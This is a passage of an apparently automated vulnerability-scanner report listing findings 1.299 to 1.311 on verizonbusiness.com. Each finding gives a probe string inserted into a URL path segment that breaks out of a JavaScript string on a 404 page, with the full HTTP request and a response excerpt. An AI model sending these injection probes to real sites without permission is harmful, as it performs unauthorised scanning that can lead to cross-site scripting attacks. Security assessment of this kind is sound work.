Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:50 GMT
Content-Type: text/html
Content-Length: 42317
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security18a5d";dbcfc28ad79/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.299. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b9e2'%3bc1e1d89168d was submitted in the REST URL parameter 3. This input was echoed as 4b9e2';c1e1d89168d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/managed4b9e2'%3bc1e1d89168d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43492
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/managed4b9e2';c1e1d89168d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.300. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd06d"%3b473c39c05ed was submitted in the REST URL parameter 3. This input was echoed as bd06d";473c39c05ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/managedbd06d"%3b473c39c05ed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43492
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/managedbd06d";473c39c05ed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.301. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/network-based/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c62bc"%3b5758160497b was submitted in the REST URL parameter 1. This input was echoed as c62bc";5758160497b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsc62bc"%3b5758160497b/security/network-based/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsc62bc";5758160497b/security/network-based/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.302. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/network-based/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0ad6'%3ba17eab6d31c was submitted in the REST URL parameter 1. This input was echoed as e0ad6';a17eab6d31c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productse0ad6'%3ba17eab6d31c/security/network-based/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productse0ad6';a17eab6d31c/security/network-based/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.303. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/network-based/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97435"%3be057743c78c was submitted in the REST URL parameter 2. This input was echoed as 97435";e057743c78c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security97435"%3be057743c78c/network-based/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:02 GMT
Content-Type: text/html
Content-Length: 42329
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security97435";e057743c78c/network-based/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.304. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/network-based/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ef13'%3bcef8a27d79e was submitted in the REST URL parameter 2. This input was echoed as 5ef13';cef8a27d79e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security5ef13'%3bcef8a27d79e/network-based/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:11 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 42327
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security5ef13';cef8a27d79e/network-based/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.305. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/network-based/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74fdf'%3b7ee2c419acb was submitted in the REST URL parameter 3. This input was echoed as 74fdf';7ee2c419acb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/network-based74fdf'%3b7ee2c419acb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43504
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/network-based74fdf';7ee2c419acb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.306. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/network-based/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1cd2"%3b0443b9841be was submitted in the REST URL parameter 3. This input was echoed as e1cd2";0443b9841be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/network-basede1cd2"%3b0443b9841be/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43504
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/network-basede1cd2";0443b9841be/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.307. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60788"%3bdcd99a663f7 was submitted in the REST URL parameter 1. This input was echoed as 60788";dcd99a663f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products60788"%3bdcd99a663f7/security/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Date: Wed, 17 Nov 2010 00:40:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products60788";dcd99a663f7/security/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.308. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9a81'%3bde535aeb30a was submitted in the REST URL parameter 1. This input was echoed as e9a81';de535aeb30a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productse9a81'%3bde535aeb30a/security/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productse9a81';de535aeb30a/security/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.309. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29fec"%3b9c8faf5d616 was submitted in the REST URL parameter 2. This input was echoed as 29fec";9c8faf5d616 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security29fec"%3b9c8faf5d616/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42319
Date: Wed, 17 Nov 2010 00:40:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security29fec";9c8faf5d616/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.310. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ccaf'%3baf7c4f24136 was submitted in the REST URL parameter 2. This input was echoed as 8ccaf';af7c4f24136 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security8ccaf'%3baf7c4f24136/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:03 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security8ccaf';af7c4f24136/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.311. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36f1d"%3b6f0599a3638 was submitted in the REST URL parameter 3. This input was echoed as 36f1d";6f0599a3638 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

